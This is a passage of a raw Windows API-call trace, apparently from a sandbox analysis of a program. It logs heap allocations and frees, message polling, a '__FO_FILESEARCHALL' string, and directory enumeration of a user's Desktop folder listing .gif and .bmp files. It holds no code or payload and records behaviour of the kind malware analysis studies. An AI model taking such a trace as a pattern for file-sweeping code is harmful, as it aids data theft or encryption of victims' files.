lpMem=0x9ba750 | out: hHeap=0x8a0000) returned 1 [0157.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba780 | out: hHeap=0x8a0000) returned 1 [0157.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e00 | out: hHeap=0x8a0000) returned 1 [0157.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df190 | out: hHeap=0x8a0000) returned 1 [0157.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6c0 | out: hHeap=0x8a0000) returned 1 [0157.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1da0 | out: hHeap=0x8a0000) returned 1 [0157.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1db0 | out: hHeap=0x8a0000) returned 1 [0157.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0157.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba768 | out: hHeap=0x8a0000) returned 1 [0157.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba738 | out: hHeap=0x8a0000) returned 1 [0157.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0157.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dc0 | out: hHeap=0x8a0000) returned 1 [0157.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d50 | out: hHeap=0x8a0000) returned 1 [0157.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0157.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d90 | out: hHeap=0x8a0000) returned 1 [0157.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e40 | out: hHeap=0x8a0000) returned 1 [0157.255] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.255] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0157.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0157.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e40 | out: hHeap=0x8a0000) returned 1 [0157.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba780 | out: hHeap=0x8a0000) returned 1 [0157.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba780 | out: hHeap=0x8a0000) returned 1 [0157.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dc0 | out: hHeap=0x8a0000) returned 1 [0157.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d50 | out: hHeap=0x8a0000) returned 1 [0157.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e30 | out: hHeap=0x8a0000) returned 1 [0157.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1df0 | out: hHeap=0x8a0000) returned 1 [0157.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba7f8 | out: hHeap=0x8a0000) returned 1 [0157.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba7e0 | out: hHeap=0x8a0000) returned 1 [0157.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba7e0 | out: hHeap=0x8a0000) returned 1 [0157.256] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8a0 | out: hHeap=0x8a0000) returned 1 [0157.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8d0 | out: hHeap=0x8a0000) returned 1 [0157.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e10 | out: hHeap=0x8a0000) returned 1 [0157.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ea0 | out: hHeap=0x8a0000) returned 1 [0157.256] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\*", lpFindFileData=0x87e630 | out: lpFindFileData=0x87e630*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb4ff6880, ftCreationTime.dwHighDateTime=0x1d5df51, ftLastAccessTime.dwLowDateTime=0x458ca660, ftLastAccessTime.dwHighDateTime=0x1d5dc69, ftLastWriteTime.dwLowDateTime=0x458ca660, ftLastWriteTime.dwHighDateTime=0x1d5dc69, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName=".", cAlternateFileName="")) returned 0x90af18 [0157.275] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e630 | out: lpFindFileData=0x87e630*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb4ff6880, ftCreationTime.dwHighDateTime=0x1d5df51, ftLastAccessTime.dwLowDateTime=0x458ca660, ftLastAccessTime.dwHighDateTime=0x1d5dc69, ftLastWriteTime.dwLowDateTime=0x458ca660, ftLastWriteTime.dwHighDateTime=0x1d5dc69, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="..", cAlternateFileName="")) returned 1 [0157.275] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e630 | out: lpFindFileData=0x87e630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4262450, ftCreationTime.dwHighDateTime=0x1d5def5, ftLastAccessTime.dwLowDateTime=0x8e9e2530, ftLastAccessTime.dwHighDateTime=0x1d5e74b, ftLastWriteTime.dwLowDateTime=0x8e9e2530, ftLastWriteTime.dwHighDateTime=0x1d5e74b, nFileSizeHigh=0x0, nFileSizeLow=0xbc0c, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="E5mhIaTvFij2bqaC0v.gif", cAlternateFileName="E5MHIA~1.GIF")) returned 1 [0157.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0157.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8d0 [0157.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ea0 [0157.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8d0 | out: hHeap=0x8a0000) returned 1 [0157.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0157.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2af8 | out: hHeap=0x8a0000) returned 1 [0157.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e60 | out: hHeap=0x8a0000) returned 1 [0157.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8b8 | out: hHeap=0x8a0000) returned 1 [0157.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8a0 | out: hHeap=0x8a0000) returned 1 [0157.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0157.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dd0 | out: hHeap=0x8a0000) returned 1 [0157.276] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1dd0 [0157.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1e60 [0157.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1e10 [0157.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e10 | out: hHeap=0x8a0000) returned 1 [0157.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e60 | out: hHeap=0x8a0000) returned 1 [0157.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dd0 | out: hHeap=0x8a0000) returned 1 [0157.276] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1dd0 [0157.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dd0 | out: hHeap=0x8a0000) returned 1 [0157.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0157.276] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1dd0 [0157.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0157.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8a0 [0157.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1e60 [0157.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e60 | out: hHeap=0x8a0000) returned 1 [0157.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8b8 [0157.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1e60 [0157.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8d0 [0157.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8a0 | out: hHeap=0x8a0000) returned 1 [0157.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0157.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dd0 | out: hHeap=0x8a0000) returned 1 [0157.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8b8 | out: hHeap=0x8a0000) returned 1 [0157.276] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1dd0 [0157.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1e10 [0157.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e10 | out: hHeap=0x8a0000) returned 1 [0157.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dd0 | out: hHeap=0x8a0000) returned 1 [0157.277] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1dd0 [0157.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1e10 [0157.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e10 | out: hHeap=0x8a0000) returned 1 [0157.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dd0 | out: hHeap=0x8a0000) returned 1 [0157.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0157.277] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1dd0 [0157.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8b8 [0157.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1e10 [0157.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8a0 [0157.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1eb0 [0157.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8e2af8 [0157.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8a0 | out: hHeap=0x8a0000) returned 1 [0157.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ec0 [0157.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8a0 [0157.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8e8 [0157.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ed0 [0157.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ec0 | out: hHeap=0x8a0000) returned 1 [0157.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8e8 | out: hHeap=0x8a0000) returned 1 [0157.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ed0 | out: hHeap=0x8a0000) returned 1 [0157.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8a0 | out: hHeap=0x8a0000) returned 1 [0157.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e10 | out: hHeap=0x8a0000) returned 1 [0157.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dd0 | out: hHeap=0x8a0000) returned 1 [0157.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2af8 | out: hHeap=0x8a0000) returned 1 [0157.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1eb0 | out: hHeap=0x8a0000) returned 1 [0157.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8b8 | out: hHeap=0x8a0000) returned 1 [0157.278] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0157.278] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1eb0 [0157.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1eb0 | out: hHeap=0x8a0000) returned 1 [0157.278] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1eb0 [0157.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0157.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8b8 [0157.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1dd0 [0157.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dd0 | out: hHeap=0x8a0000) returned 1 [0157.278] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3da0eaa0, ftCreationTime.dwHighDateTime=0x1d5d9bd, ftLastAccessTime.dwLowDateTime=0x47dd5440, ftLastAccessTime.dwHighDateTime=0x1d5e458, ftLastWriteTime.dwLowDateTime=0x47dd5440, ftLastWriteTime.dwHighDateTime=0x1d5e458, nFileSizeHigh=0x0, nFileSizeLow=0x8a16, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="JLQ6tYmOaaqJ7B5t.gif", cAlternateFileName="JLQ6TY~1.GIF")) returned 1 [0157.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8a0 [0157.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x8ee3c8 [0157.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1dd0 [0157.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8b8 | out: hHeap=0x8a0000) returned 1 [0157.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0157.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1eb0 | out: hHeap=0x8a0000) returned 1 [0157.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee3c8 | out: hHeap=0x8a0000) returned 1 [0157.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dd0 | out: hHeap=0x8a0000) returned 1 [0157.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8a0 | out: hHeap=0x8a0000) returned 1 [0157.278] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1dd0 [0157.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1eb0 [0157.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1eb0 | out: hHeap=0x8a0000) returned 1 [0157.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dd0 | out: hHeap=0x8a0000) returned 1 [0157.279] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1dd0 [0157.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1eb0 [0157.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1eb0 | out: hHeap=0x8a0000) returned 1 [0157.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dd0 | out: hHeap=0x8a0000) returned 1 [0157.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0157.279] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1dd0 [0157.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8a0 [0157.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1eb0 [0157.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8b8 [0157.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1e10 [0157.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8e2af8 [0157.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8b8 | out: hHeap=0x8a0000) returned 1 [0157.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ed0 [0157.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8b8 [0157.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8e8 [0157.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ec0 [0157.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ed0 | out: hHeap=0x8a0000) returned 1 [0157.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8e8 | out: hHeap=0x8a0000) returned 1 [0157.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ec0 | out: hHeap=0x8a0000) returned 1 [0157.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8b8 | out: hHeap=0x8a0000) returned 1 [0157.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1eb0 | out: hHeap=0x8a0000) returned 1 [0157.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dd0 | out: hHeap=0x8a0000) returned 1 [0157.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2af8 | out: hHeap=0x8a0000) returned 1 [0157.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e10 | out: hHeap=0x8a0000) returned 1 [0157.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8a0 | out: hHeap=0x8a0000) returned 1 [0157.280] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0157.280] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1e10 [0157.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e10 | out: hHeap=0x8a0000) returned 1 [0157.280] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1e10 [0157.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0157.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8a0 [0157.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1dd0 [0157.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dd0 | out: hHeap=0x8a0000) returned 1 [0157.280] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f8ef0e0, ftCreationTime.dwHighDateTime=0x1d5e359, ftLastAccessTime.dwLowDateTime=0xb6fce980, ftLastAccessTime.dwHighDateTime=0x1d5ddcd, ftLastWriteTime.dwLowDateTime=0xb6fce980, ftLastWriteTime.dwHighDateTime=0x1d5ddcd, nFileSizeHigh=0x0, nFileSizeLow=0xefde, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="Kq7hl.bmp", cAlternateFileName="")) returned 1 [0157.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8b8 [0157.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1b8 [0157.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1dd0 [0157.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8a0 | out: hHeap=0x8a0000) returned 1 [0157.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0157.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e10 | out: hHeap=0x8a0000) returned 1 [0157.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1b8 | out: hHeap=0x8a0000) returned 1 [0157.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dd0 | out: hHeap=0x8a0000) returned 1 [0157.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8b8 | out: hHeap=0x8a0000) returned 1 [0157.280] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.280] RtlAllocateHeap (HeapHandle=0x8a0000, 